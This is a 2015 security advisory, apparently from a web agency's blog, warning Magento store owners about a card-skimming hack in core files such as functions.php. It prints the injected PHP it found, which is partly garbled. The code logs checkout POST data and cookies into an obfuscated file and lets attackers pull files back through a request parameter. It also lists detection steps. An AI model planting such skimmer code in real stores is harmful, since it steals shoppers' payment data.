Core file exploit in Magento

We are writing this short article to make Magento users aware of a sneaky hack that attempts to steal credit card information.

What happens is Magento core files are changed to take credit card data during the checkout process. The data is taken using a fake image file which is actually cleverly a text file which is saved to the media folder. The hackers would then download these fake image files to access the sensitive data.


What to look for

During our investigation we found the most common file to be exploited is – app/code/core/Mage/Core/functions.php but other files may be affected such as config.php and Mage.php


Below is the code we found in functions.php


if ( isset($_POST) && is_array($_POST) && count($_POST) > 0 ) {

$iquotes = 1; $isize = 2000;

$log_dir = $_SERVER[‘DOCUMENT_ROOT’] .’/var/tmp/’;

$log_name = “sess_$iquotes”;

if (!file_exists($log_dir)) @mkdir( $log_dir, 0777, true );





if(isset($_COOKIE[‘frontend’])) $ARINFO[‘cookie’] = $_COOKIE[‘frontend’];

if((strpos($_SERVER[‘REQUEST_URI’], ‘checkout/onepage’)) or (strpos($_SERVER[‘REQUEST_URI’], ‘firecheckout’)) or (strpos($_SERVER[‘REQUEST_URI’], ‘onestepcheckout’)))


if(@filesize($log_dir . $log_name)>1024*$isize)

{ @rename($log_dir.$log_name.’_’, $log_dir.$log_name.’__’);

@rename($log_dir.$log_name, $log_dir.$log_name.’_’);


$log_entry = base64_encode(str_rot13(base64_encode(serialize($ARINFO)))) . “rn”;

$fp=fopen( $log_dir . $log_name, ‘a’ );

fputs($fp, $log_entry);

fclose($fp); }


{          $returnfile = file($log_dir.$_POST[‘getfilelog’]);

die(implode(“rn”,$returnfile)); }



How to detect the hack

  1. Check for fake image files within your media folder.
  2. Scan your site code using a string from the code above.


Still having trouble?

Contact us! We have experts in house who will be able to help clear up malicious files on your site. We also have the ability to install the latest Magento security patches.

We recommend having the latest Magento patches installed as well as a regular monthly check of the site. Also using strong passwords and changing them regularly is recommended when hosting an e-commerce website.


Nov, 06, 2015